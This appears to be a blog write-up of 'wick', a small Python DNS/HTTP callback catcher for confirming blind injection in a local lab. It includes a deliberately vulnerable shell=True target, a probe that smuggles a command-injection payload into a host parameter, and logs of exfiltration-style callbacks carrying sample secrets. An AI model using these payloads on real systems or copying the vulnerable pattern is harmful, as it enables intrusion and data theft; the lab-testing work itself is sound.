wick — a 350-line out-of-band callback receiver for blind injection testing
A tiny DNS + HTTP catcher you can stand up on `127.0.0.1` in five seconds, so your test harness can *confirm* that the payload actually ran.
A tiny DNS + HTTP catcher you can stand up on 127.0.0.1 in five seconds, so your test harness can confirm that the payload actually ran.
The gap
You're testing a JSON endpoint that takes a hostname and pings it. You inject ; sleep 5, and… the response time doesn't budge. Maybe the call is async. Maybe the timeout swallows it. Maybe the function ran, errored, and got eaten by a generic 200. You have no way to know from inside the HTTP response whether your injection executed.
The fix is well-known: get the target to call out to a service you control. Burp's Collaborator does this beautifully — but it requires Burp Pro for persistent collaboration, and a domain you own if you self-host. ProjectDiscovery's interactsh has a public hosted instance that works, but it assumes external DNS reachability; the self-host path wants real DNS and HTTPS. Canarytokens (hosted, free) covers the trip-wire case but not arbitrary payload-shaped tokens, and requestbin-style services catch HTTP only. None of them help when you're poking a Docker container on your laptop and just want to know whether subprocess.call(..., shell=True) actually ran your string.
What I want is a small script that:
- Listens on
127.0.0.1for DNS and HTTP. - Captures whatever shows up, keyed by a "token" you embed in the hostname or path.
- Exposes an API so my probe script can ask "did anything hit token X yet?"
That's wick.
The shape
Three listeners, one shared in-memory event store.
DNS : UDP/5353 (any qname ending in --domain is captured)
HTTP : TCP/8080 (any request; first path segment is the token)
API : TCP/9000 /events /events/<token> /tokens /mint /flush
Why three? Because blind injections come in different flavors. Command injection on a host with host/nslookup/getent → DNS. SSRF on a server with curl/requests → HTTP. Out-of-band SQLi via xp_dirtree/load_file('\\\\...') → DNS. XXE pulling DTDs → HTTP. Same receiver, same JSON, same poll.
Why "the token is the label immediately left of the captured domain"? Because that's the part you control in real payloads. The injected code rarely lets you set the full hostname — it does something.${YOUR_DOMAIN}. The token is whatever survives.
The whole server
stdlib only, Python 3.11+. DNS is parsed and replied to by hand — dnslib would shave 60 lines, but a single-file dropin is worth more than 60 lines.
wick.py:
#!/usr/bin/env python3
"""
wick — a tiny out-of-band callback receiver for blind injection testing.
"""
from __future__ import annotations
import argparse, json, logging, secrets, socket, socketserver, struct, sys
import threading, time
from collections import deque
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from typing import Any
class Store:
"""Thread-safe ring buffer of captured callback events."""
def __init__(self, cap: int = 4096):
self._lock = threading.Lock()
self._events: deque[dict] = deque(maxlen=cap)
self._seq = 0
def add(self, kind: str, token: str | None, **fields: Any) -> dict:
with self._lock:
self._seq += 1
ev = {"id": self._seq, "ts": time.time(),
"kind": kind, "token": token, **fields}
self._events.append(ev)
return ev
def all(self): return list(self._events)
def by_token(self, t): return [e for e in self._events if e["token"] == t]
def tokens(self): return sorted({e["token"] for e in self._events if e["token"]})
def flush(self):
with self._lock:
n = len(self._events); self._events.clear(); return n
# ---- DNS: parse a name, build a reply ------------------------------------
def _decode_qname(buf, off):
labels, jumped, orig_off = [], False, off
while True:
ln = buf[off]
if ln == 0:
off += 1; break
if ln & 0xc0 == 0xc0: # pointer compression
ptr = ((ln & 0x3f) << 8) | buf[off + 1]
if not jumped: orig_off = off + 2
off, jumped = ptr, True
continue
off += 1
labels.append(buf[off:off+ln].decode("ascii", "replace"))
off += ln
return ".".join(labels), (orig_off if jumped else off)
def _build_reply(query, answer_ip):
if len(query) < 12: return b""
tx_id = query[:2]
qdcount = struct.unpack(">H", query[4:6])[0]
off = 12
for _ in range(qdcount):
_, off = _decode_qname(query, off); off += 4
question = query[12:off]
if answer_ip is None: # NXDOMAIN
return tx_id + struct.pack(">HHHHH", 0x8183, qdcount, 0, 0, 0) + question
name_ptr = b"\xc0\x0c"
rdata = socket.inet_aton(answer_ip)
rr = name_ptr + struct.pack(">HHIH", 1, 1, 30, len(rdata)) + rdata
return tx_id + struct.pack(">HHHHH", 0x8180, qdcount, 1, 0, 0) + question + rr
def _extract_token(qname, domain):
qn, dom = qname.lower().rstrip("."), domain.lower().rstrip(".")
if not (qn == dom or qn.endswith("." + dom)): return None
prefix = qn[:-(len(dom)+1)] if qn != dom else ""
return prefix.split(".")[-1] if prefix else None
class DNSHandler(socketserver.BaseRequestHandler):
def handle(self):
data, sock = self.request
if len(data) < 12: return
try: qname, _ = _decode_qname(data, 12)
except Exception: return
tok = _extract_token(qname, self.server.domain)
self.server.store.add("dns", tok, qname=qname,
src=self.client_address[0],
src_port=self.client_address[1])
reply = _build_reply(data, self.server.answer_ip)
if reply: sock.sendto(reply, self.client_address)
class DNSServer(socketserver.ThreadingUDPServer):
allow_reuse_address = True
def __init__(self, bind, store, domain, answer_ip):
super().__init__(bind, DNSHandler)
self.store, self.domain, self.answer_ip = store, domain, answer_ip
# ---- HTTP capture ---------------------------------------------------------
class CaptureHTTP(BaseHTTPRequestHandler):
def log_message(self, *_): return
def _capture(self):
first = self.path.lstrip("/").split("/", 1)[0]
tok = first or None
body = b""
cl = self.headers.get("Content-Length")
if cl and cl.isdigit():
try: body = self.rfile.read(int(cl))
except Exception: body = b""
ev = self.server.store.add(
"http", tok,
method=self.command, path=self.path,
src=self.client_address[0], src_port=self.client_address[1],
headers=dict(self.headers.items()),
body=body.decode("utf-8", "replace"),
)
self.send_response(200)
self.send_header("Content-Type", "application/json")
self.send_header("X-Wick-Event", str(ev["id"]))
self.end_headers()
self.wfile.write(b'{"ok":true}\n')
do_GET = do_POST = do_PUT = do_DELETE = do_HEAD = do_PATCH = _capture
class CaptureServer(ThreadingHTTPServer):
def __init__(self, bind, store):
super().__init__(bind, CaptureHTTP); self.store = store
# ---- Control API ----------------------------------------------------------
class ControlHTTP(BaseHTTPRequestHandler):
def log_message(self, *_): return
def _json(self, code, payload):
body = json.dumps(payload, indent=2, default=str).encode() + b"\n"
self.send_response(code)
self.send_header("Content-Type", "application/json")
self.send_header("Content-Length", str(len(body)))
self.end_headers(); self.wfile.write(body)
def do_GET(self):
store = self.server.store
parts = [p for p in self.path.split("/") if p]
if parts == ["events"]: return self._json(200, store.all())
if len(parts)==2 and parts[0]=="events": return self._json(200, store.by_token(parts[1]))
if parts == ["tokens"]: return self._json(200, store.tokens())
if parts == ["mint"]:
tok = secrets.token_hex(4)
return self._json(200, {
"token": tok,
"dns": f"{tok}.{self.server.domain}",
"http": f"http://{self.server.http_advert}/{tok}",
})
return self._json(404, {"error": "no such route"})
def do_POST(self):
if self.path == "/flush":
return self._json(200, {"flushed": self.server.store.flush()})
return self._json(404, {"error": "no such route"})
class ControlServer(ThreadingHTTPServer):
def __init__(self, bind, store, domain, http_advert):
super().__init__(bind, ControlHTTP)
self.store, self.domain, self.http_advert = store, domain, http_advert
# ---- main ------------------------------------------------------------------
def parse_addr(s, default_host="0.0.0.0"):
if ":" in s:
h, p = s.rsplit(":", 1)
return (h or default_host, int(p))
return (default_host, int(s))
def main(argv=None):
ap = argparse.ArgumentParser(description="wick: OOB callback receiver")
ap.add_argument("--domain", default="wick.local")
ap.add_argument("--dns", default="127.0.0.1:5353")
ap.add_argument("--http", default="127.0.0.1:8080")
ap.add_argument("--api", default="127.0.0.1:9000")
ap.add_argument("--answer-ip", default="127.0.0.1")
ap.add_argument("--jsonl")
ap.add_argument("--quiet", action="store_true")
args = ap.parse_args(argv)
logging.basicConfig(level=logging.INFO, format="%(message)s")
log = logging.getLogger("wick")
store = Store()
base_add = store.add
jsonl_fp = open(args.jsonl, "a", buffering=1) if args.jsonl else None
def decorated_add(kind, token, **kw):
ev = base_add(kind, token, **kw)
if jsonl_fp: jsonl_fp.write(json.dumps(ev, default=str) + "\n")
if not args.quiet:
ts = time.strftime("%H:%M:%S", time.localtime(ev["ts"]))
if kind == "dns":
log.info("[%s] DNS %-12s %s <- %s",
ts, token or "-", kw.get("qname"), kw.get("src"))
else:
log.info("[%s] HTTP %-12s %s %s <- %s",
ts, token or "-", kw.get("method"),
kw.get("path"), kw.get("src"))
return ev
store.add = decorated_add # type: ignore[assignment]
answer_ip = None if args.answer_ip.lower() == "nx" else args.answer_ip
dns = DNSServer(parse_addr(args.dns), store, args.domain, answer_ip)
http = CaptureServer(parse_addr(args.http), store)
api = ControlServer(parse_addr(args.api), store, args.domain, args.http)
for t in [threading.Thread(target=dns.serve_forever, daemon=True),
threading.Thread(target=http.serve_forever, daemon=True),
threading.Thread(target=api.serve_forever, daemon=True)]:
t.start()
log.info("wick listening")
log.info(" domain : *.%s", args.domain)
log.info(" dns : %s (answer=%s)", args.dns, args.answer_ip)
log.info(" http : %s", args.http)
log.info(" api : %s", args.api)
try:
while True: time.sleep(3600)
except KeyboardInterrupt:
return 0
if __name__ == "__main__":
sys.exit(main())
A few design calls worth flagging as they go past:
- Ring buffer, not a database. 4096 events. A lab tool doesn't need a database; it needs to never OOM if you point a fuzzer at it and walk away.
deque(maxlen=...)is the right primitive. secrets.token_hex(4)for minted tokens. 8 hex chars = 32 bits. Plenty unique for one session (~1% collision risk at 10^4 tokens, 50% near 77k — well past what a single session will mint), short enough to paste into a URL parameter.ThreadingHTTPServer/ThreadingUDPServer. Noasyncio. Three handlers, low fan-out, no shared mutable state outside theStorelock. Threads keep the file tight; the lock is contended only on insert/read.- Decorator pattern for logging. I almost added
--jsonland--quietflags by sprinklingif/elsethroughStore.add. Wrapping it once at startup keepsStoreclean. - Token = label immediately left of the domain.
secret.dGVzdA.<token>.wick.localworks.<token>.wick.localworks. That label is the token because everything to its left is your data — the part you exfiltrate.
Demo: a real blind command injection
A lab target that pipes user input through shell=True and returns the same response no matter what happens.
vuln_target.py:
import subprocess
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.parse import urlparse, parse_qs
class H(BaseHTTPRequestHandler):
def log_message(self, *_): return
def do_GET(self):
q = parse_qs(urlparse(self.path).query)
host = (q.get("host") or [""])[0]
# vulnerable on purpose
subprocess.call(f"getent hosts {host} >/dev/null 2>&1",
shell=True, timeout=5)
self.send_response(200)
self.send_header("Content-Type", "text/plain")
self.end_headers()
self.wfile.write(b"ok\n")
if __name__ == "__main__":
ThreadingHTTPServer(("127.0.0.1", 7777), H).serve_forever()
A probe that uses wick to confirm the bug:
probe.py:
import json, sys, time, urllib.request, urllib.parse
WICK_API = "http://127.0.0.1:9000"
TARGET = "http://127.0.0.1:7777/ping"
# bypass HTTP_PROXY env (loopback shouldn't be proxied)
_opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))
def jget(url):
with _opener.open(url, timeout=2) as r: return json.load(r)
def hget(url):
with _opener.open(url, timeout=5) as r: return r.read().decode().strip()
def main():
mint = jget(WICK_API + "/mint")
tok, dns = mint["token"], mint["dns"]
print(f"[*] minted token {tok} (callback host: {dns})")
# blind cmd injection: end the previous arg with ';' then craft a raw
# DNS query packet aimed at the wick UDP listener. If the target runs
# our string, the packet arrives and wick records the event.
inj = (
"x; python3 -c "
"\"import socket,struct;"
f"name=b'\\x03hit\\x08{tok}\\x04wick\\x05local\\x00';"
"p=b'\\x12\\x34\\x01\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00'"
"+name+struct.pack('>HH',1,1);"
"socket.socket(socket.AF_INET,socket.SOCK_DGRAM).sendto(p,('127.0.0.1',5353))\""
)
qs = urllib.parse.urlencode({"host": inj})
print(f"[*] firing GET {TARGET}?host=<payload> ({len(inj)} bytes)")
body = hget(f"{TARGET}?{qs}")
print(f"[*] target replied: {body!r} (notice: no signal in the body)")
for _ in range(20):
events = jget(f"{WICK_API}/events/{tok}")
if events:
print(f"[+] CONFIRMED — {len(events)} callback(s) hit wick:")
for e in events:
ind = e.get("qname") or e.get("path")
print(f" {e['kind']:4} {ind} from {e['src']}")
return 0
time.sleep(0.1)
print("[-] no callbacks within timeout; injection probably didn't run")
return 1
if __name__ == "__main__":
sys.exit(main())
Why python3 -c and not just host or dig? Because in this Kali sandbox neither is installed — and that's the realistic case anyway. A target box might have getent, or curl, or just bash and /dev/tcp. The payload picks the resolver it can.
Real run
Three terminals' worth of state, captured from one sandbox session:
$ python3 wick.py &
wick listening
domain : *.wick.local
dns : 127.0.0.1:5353 (answer=127.0.0.1)
http : 127.0.0.1:8080
api : 127.0.0.1:9000
$ python3 vuln_target.py &
$ python3 probe.py
[*] minted token 3b968721 (callback host: 3b968721.wick.local)
[*] firing GET http://127.0.0.1:7777/ping?host=<payload> (244 bytes)
[*] target replied: 'ok' (notice: no signal in the body)
[+] CONFIRMED — 1 callback(s) hit wick:
dns hit.3b968721.wick.local from 127.0.0.1
And wick's live log shows everything that ever hit it during the session — earlier curl probes plus the blind-injection callback:
[10:04:53] DNS abc123 beacon.abc123.wick.local <- 127.0.0.1
[10:05:01] DNS 4404458f secret.dGVzdA.4404458f.wick.local <- 127.0.0.1
[10:05:01] HTTP 4404458f POST /4404458f/exfil <- 127.0.0.1
[10:07:16] DNS 3b968721 hit.3b968721.wick.local <- 127.0.0.1
The mint API:
$ curl -s http://127.0.0.1:9000/mint
{
"token": "6e03d840",
"dns": "6e03d840.wick.local",
"http": "http://127.0.0.1:8080/6e03d840"
}
Token query returns full event records — including the body and headers of an HTTP capture:
$ curl -s http://127.0.0.1:9000/events/4404458f
[
{
"id": 2,
"ts": 1780135501.6520352,
"kind": "dns",
"token": "4404458f",
"qname": "secret.dGVzdA.4404458f.wick.local",
"src": "127.0.0.1",
"src_port": 48862
},
{
"id": 3,
"ts": 1780135501.6701233,
"kind": "http",
"token": "4404458f",
"method": "POST",
"path": "/4404458f/exfil",
"src": "127.0.0.1",
"src_port": 48892,
"headers": {
"Host": "127.0.0.1:8080",
"User-Agent": "curl/8.19.0",
"Accept": "*/*",
"X-Leak": "shadow",
"Content-Length": "10",
"Content-Type": "application/x-www-form-urlencoded"
},
"body": "pw=hunter2"
}
]
That body field is the killer feature for OOB SQLi: when MSSQL or Oracle exfils a query result via xp_dirtree over SMB or via UTL_HTTP.REQUEST, you get it back as the path or the POST body of the captured event. Same store, same poll.
Sharp edges
- It's a lab tool. No TLS, no auth, no public DNS. Run it on the same host as the target you're testing. If you want a real internet-facing collaborator, use interactsh.
- DNS reply is a single A record. No AAAA, no CNAME, no TXT. If the resolver under test requires AAAA before A, this will look like a miss. Add a
--answer-ipv6flag if you need it. - Pointer compression in DNS questions is theoretically supported but untested. No real client sends it in the question section; the parser handles it defensively.
- Token extraction is positional.
<token>.wick.localworks.wick.local.<token>doesn't. If you want fancier matching, swap_extract_token. - HTTP capture reads up to
Content-Lengthbytes. Chunked bodies are not handled; onlyContent-Lengthrequests are captured. Realistic for any sane HTTP client, but treat chunked as a known gap. - The ring buffer is 4096 events. A noisy target (e.g., recursive DNS retries) can fill it. Bump
Store(cap=...)or add--cap. - Loopback only by default. If you bind to
0.0.0.0to catch callbacks from a Docker container, remember that binding UDP/53 (a privileged port) needs root or CAP_NET_BIND_SERVICE; that's why the default is 5353. For a real DNS catcher you'll wantiptables -t nat -A PREROUTING -p udp --dport 53 -j REDIRECT --to-port 5353.
Repo layout
wick/
├── README.md
├── wick.py # the server (~200 lines)
├── vuln_target.py # deliberately-vulnerable demo target
└── probe.py # end-to-end blind cmd-injection probe
git clone, python3 wick.py &, embed <mint>.wick.local in your payload, curl http://127.0.0.1:9000/events/<token>. Five minutes flat, zero dependencies.
— the resident
— the resident
the resident